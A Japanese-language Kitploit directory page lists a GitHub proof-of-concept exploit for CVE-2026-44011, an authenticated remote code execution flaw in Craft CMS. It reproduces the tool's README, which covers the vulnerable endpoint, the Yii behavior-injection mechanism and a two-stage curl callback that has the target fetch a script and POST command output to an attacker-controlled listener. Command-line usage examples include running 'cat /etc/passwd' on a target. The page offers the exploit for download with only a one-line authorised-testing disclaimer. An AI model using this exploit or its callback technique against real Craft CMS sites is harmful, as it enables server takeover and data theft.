Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/khush-613/cve-2026-44011-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストリモートアクセスツールペイロード開発
GitHubkhush-613/cve-2026-44011-poc

CVE-2026-44011-poc

CVE-2026-44011 の Python 概念実証エクスプロイト。Yii の behavior インジェクションを悪用した Craft CMS の認証済み RCE で、2段階のコマンド出力キャプチャを備える。

リポジトリを見る
162日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-44011

Yiiのbehaviorインジェクションを介したCraft CMSの認証済みRCE。

影響を受けるバージョン: 4.0.0–4.17.11、5.0.0–5.9.17
修正バージョン: 4.17.12、5.9.18
アドバイザリ: GHSA-qrgm-p9w5-rrfw

脆弱性

/admin/actions/element-search/search エンドポイントは condition パラメータを受け取り、それを Component::cleanseConfig() を最初に呼び出すことなく ElementCondition::createCondition() に直接渡します。これは、FieldLayout オブジェクトがリクエストデータから構築されるときに、Yiiの特別なオブジェクト構築キー — __class、as <name>(behaviorのアタッチ)、on <event>(ハンドラの登録) — が有効になることを意味します。

このエクスプロイトは、typecast callableとして Psy\Readline\Hoa\ConsoleProcessus::execute()(シェルコマンドを実行するPSY/Yiiの内部機能)を呼び出すように設定された AttributeTypecastBehavior をアタッチします。このbehaviorは beforeSave イベントで発火し、Craftは同じリクエスト中にそれをトリガーします。

低権限の編集者であっても、どのアカウントでもこれを行うことができます。管理者権限は必要ありません。

このエクスプロイトの仕組み

ブラインドリバースシェルではなく、2段階の出力キャプチャを使用します:

  1. ステージ1 — あなたが制御するローカルHTTPリスナーからシェルスクリプトを取得する curl コマンドを注入します
  2. ステージ2 — そのスクリプトを実行する2番目のコマンドを注入します。スクリプトはその出力をあなたのリスナーにPOSTで送信します

コマンド出力はターミナルで直接得られ、ncリスナーは不要です。

要件

  • Python 3.8+
  • requests ライブラリ(pip install requests)
  • ターゲットがあなたのマシンに到達できること(コールバック用)
  • 任意のCraft CMSアカウントの有効な認証情報

使用方法

# 基本 — ターゲットでidを実行
python3 exploit.py \
  -b http://target.com \
  -u [email protected] \
  -p 'password123' \
  -c 'id'

# カスタムコントロールパネルパス
python3 exploit.py -b http://target.com -P /craftcms -u admin -p pass -c 'whoami'

# 推測できない場合にコールバックアドレスを指定
python3 exploit.py -b http://target.com -u admin -p pass -c 'cat /etc/passwd' \
  -H 10.10.14.5 --listen-port 8080

# TLS検証をスキップ(自己署名証明書)
python3 exploit.py -b https://target.com -u admin -p pass -c 'id' --no-verify

# バージョンチェックをスキップ(例:バージョン検出が失敗する場合)
python3 exploit.py -b http://target.com -u admin -p pass -c 'id' --force

コールバックのホスト/ポートは、ターゲットが出力をあなたにPOSTで送信する先です。デフォルトでは、ホストはターゲットへのルートから推測され、ポートはOSによって割り当てられます。ターゲットがNATやVPNの背後にある場合は、到達可能なIPを指す --callback-host が必要です。

オプション

-b / --base-url       ターゲットのオリジン(必須)
-P / --cp-path        コントロールパネルパス(デフォルト: /admin)
-u / --username       ログイン名またはメールアドレス(必須)
-p / --password       パスワード(必須)
-c / --command        実行するシェルコマンド(必須)
-s / --site-id        CraftサイトID(デフォルト: 1)
-e / --element-type   条件の要素タイプ(デフォルト: craft\elements\Category)
-t / --timeout        リクエストタイムアウト(秒)(デフォルト: 15)
-H / --callback-host  出力コールバック用の到達可能なアドレス
     --listen-port    出力リスナーのポート(デフォルト: OSが選択)
     --no-verify      TLS証明書検証をスキップ
-F / --force          バージョン範囲チェックをスキップ

テスト済み環境

  • Craft CMS 5.9.8、Ubuntu 22.04

免責事項

許可されたセキュリティテストおよび研究のみを目的としています。

ツールをダウンロード